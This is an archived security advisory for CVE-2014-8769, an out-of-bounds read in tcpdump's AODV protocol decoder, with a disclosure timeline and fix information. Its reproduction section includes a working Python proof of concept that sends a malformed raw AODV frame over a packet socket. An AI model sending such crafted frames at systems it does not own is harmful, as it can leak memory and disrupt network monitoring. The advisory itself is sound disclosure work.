tcpdump 4.6.2 AOVD Unreliable Output

2014.11.19
Credit: Steffen Bauch
Risk: Low
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Partial

CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. 2. Summary Information It was found out that malformed network traffic (AOVD-based) can lead to an abnormal behaviour if verbose output of tcpdump monitoring the network is used. 3. Technical Description The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01" s.send(aovd_frame) 4. Affected versions Affected versions are 3.8 through 4.6.2 5. Fix The problem is fixed in the upcoming version tcpdump 4.7.0 6. Advisory Timeline 2014-11-08 Discovered 2014-11-09 Requested CVE 2014-11-11 Reported vendor by email 2014-11-12 Vendor made a fix available as repository patch 2014-11-13 CVE number received 2014-11-13 Published CVE advisory 7. Credit The issue was found by Steffen Bauch Twitter: @steffenbauch http://steffenbauch.de using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top